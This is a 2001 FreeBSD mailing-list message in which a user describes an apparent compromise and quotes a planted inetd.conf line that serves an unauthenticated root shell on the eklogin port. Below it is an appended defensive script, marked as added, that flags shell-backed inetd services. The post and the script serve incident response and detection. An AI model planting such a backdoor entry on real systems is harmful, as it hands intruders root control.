From: "Tomek"
Subject: Re: I got hacked, I think
Date: Thu, 18 Oct 2001 14:23:36 -0600
Message-ID: <03db01c15812$c4575d40$f6f073d1@mpionline.com>
Sender: owner-freebsd-questions@FreeBSD.ORG

I found out more info.

    -rw-r--r--  1 Broot  wheel     54 Sep 26 10:24 /inetd.conf
    -rw-r--r--  1 Broot  wheel  85857 Sep 26 21:38 /sudo-1.6.3.7_1.tgz
    -rw-------  1 Broot  wheel   4869 Sep 26 10:25 /etc/inetd.conf

Checking the bizarre /inetd.conf is shocking:

    eklogin stream tcp nowait root /bin/sh sh -i

I take it that "sh" would not even request a login or anything if called directly from inetd.conf, would it?

I am sitting here, he is STILL pinging me and watching the system (even tried to ftp again a few minutes ago), and for the life of me I can't figure out where it all began... who did he even login in the first time, maybe it was some buffer overflow or something.... yuck.

TY for all your help guys, you are all wonderful! I will leave you in peace now (I hope). I still don't know about Broot though...
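
A defensive check for the kind of inetd.conf entry quoted in the message above, as an added example that is not part of the original post: it scans an inetd.conf-style file and flags any service whose server program is a shell. The function name audit_inetd, the list of shell names and the sample file are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original message).
# inetd.conf fields: service socket-type protocol wait-flag user program args...

audit_inetd() {
    # $1 = path to an inetd.conf-style file; prints one line per finding.
    awk '
        /^[ \t]*(#|$)/ { next }              # skip comments and blank lines
        NF < 6         { next }              # not a complete service entry
        {
            n = split($6, p, "/"); prog = p[n]    # basename of server program
            split($5, u, ":");     user = u[1]    # drop optional :group
            sub("/.*", "", user)                  # drop optional /login-class
            if (prog ~ /^(sh|csh|tcsh|bash|ksh|zsh|ash|dash)$/) {
                sev = (user == "root") ? "CRITICAL" : "WARN"
                printf "%s %s:%d service=%s user=%s program=%s\n",
                       sev, FILENAME, FNR, $1, $5, $6
            }
        }
    ' "$1"
}

# Constructed sample: the entry quoted in the message plus a benign-looking one.
sample=$(mktemp)
cat > "$sample" <<'EOF'
# constructed sample for illustration
ftp     stream tcp nowait root /usr/libexec/ftpd ftpd -l
eklogin stream tcp nowait root /bin/sh sh -i
EOF
audit_inetd "$sample"    # flags only the eklogin line
rm -f "$sample"
```

Run it over every inetd.conf-style file on the host, including stray copies outside /etc such as the /inetd.conf in the listing, since the finding depends on which file inetd was actually started with.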